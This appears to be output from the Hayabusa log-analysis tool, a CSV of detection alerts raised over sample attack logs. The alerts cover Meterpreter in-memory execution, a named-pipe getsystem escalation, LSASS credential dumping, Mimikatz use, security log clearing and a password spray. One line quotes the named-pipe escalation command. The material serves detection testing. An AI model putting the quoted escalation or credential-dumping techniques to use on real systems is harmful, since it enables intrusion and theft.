+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:cspizor/bgreenwood/baker/dpendolino/melliott/cfleener/sarmstrong/sanson/lpesce/wstrzelec/drook/thessman/mtoussain/jorchilles/ssims/bhostetler/dmashburn/edygert/cmoody/tbennett/cdavis/zmathis/eskoudis/jleytevidal/jwright/bgalbraith/psmith/lschifano/celgee/kperryman/bking/cragoso/rbowes/jkulikowski/jlake/econrad/smisenar/mdouglas/gsalinas/Administrator/ebooth IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
+2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
